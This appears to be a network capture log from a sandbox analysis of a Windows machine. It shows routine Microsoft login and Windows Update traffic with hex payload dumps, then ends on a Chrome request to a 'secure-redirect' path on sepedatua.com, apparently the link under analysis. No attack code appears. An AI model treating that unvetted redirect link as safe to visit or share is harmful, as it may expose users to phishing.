                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:28:58 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 3592
                                                                                                                                                                                                                                                                                                                                                                          Host: login.live.com
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:28:58 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:28:58 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Expires: Wed, 13 Nov 2024 16:27:58 GMT
                                                                                                                                                                                                                                                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                          x-ms-route-info: C529_BAY
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 31dac266-cf7e-4033-a1c4-9b58cf0f5a87
                                                                                                                                                                                                                                                                                                                                                                          PPServer: PPV: 30 H: PH1PEPF00018BDD V: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:28:57 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 11392
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:28:58 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          2192.168.2.174970840.126.31.73443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:28:59 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 3592
                                                                                                                                                                                                                                                                                                                                                                          Host: login.live.com
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:28:59 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:00 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Expires: Wed, 13 Nov 2024 16:27:59 GMT
                                                                                                                                                                                                                                                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                          x-ms-route-info: C529_SN1
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: dc16c856-1db2-44dc-8569-afaaa52d55d5
                                                                                                                                                                                                                                                                                                                                                                          PPServer: PPV: 30 H: SN1PEPF0002F941 V: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:28:59 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 11392
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:00 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          3192.168.2.174971040.126.31.73443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:01 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 4775
                                                                                                                                                                                                                                                                                                                                                                          Host: login.live.com
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:01 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:01 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Expires: Wed, 13 Nov 2024 16:28:01 GMT
                                                                                                                                                                                                                                                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                          x-ms-route-info: C529_BAY
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 52511343-3f93-441e-975c-722f5d2c452e
                                                                                                                                                                                                                                                                                                                                                                          PPServer: PPV: 30 H: PH1PEPF0001B695 V: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:01 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 11392
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:01 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          4192.168.2.174971252.149.20.212443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:02 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=bspA476fsYy55S4&MD=WXEEmc47 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                                                                                                                                                                          Host: slscr.update.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:02 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                                                                                                                                                                          MS-CorrelationId: 39cdf40b-848f-429f-9222-c718c8484074
                                                                                                                                                                                                                                                                                                                                                                          MS-RequestId: 435f320e-c660-4ede-9df3-b3719b6cc269
                                                                                                                                                                                                                                                                                                                                                                          MS-CV: ouoCMfkZQEWOEH8t.0
                                                                                                                                                                                                                                                                                                                                                                          X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:01 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 24490
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:02 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:02 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          5192.168.2.174971440.126.31.73443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:02 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 4775
                                                                                                                                                                                                                                                                                                                                                                          Host: login.live.com
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:02 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:03 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Expires: Wed, 13 Nov 2024 16:28:02 GMT
                                                                                                                                                                                                                                                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                          x-ms-route-info: C529_BL2
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 87ce83b4-c190-4d37-8319-9d9bdc57efc7
                                                                                                                                                                                                                                                                                                                                                                          PPServer: PPV: 30 H: BL02EPF0001D81B V: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:02 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 11392
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:03 UTC11392INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          6192.168.2.1749707103.134.152.124436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:02 UTC678OUTGET /158983/secure-redirect HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: sepedatua.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
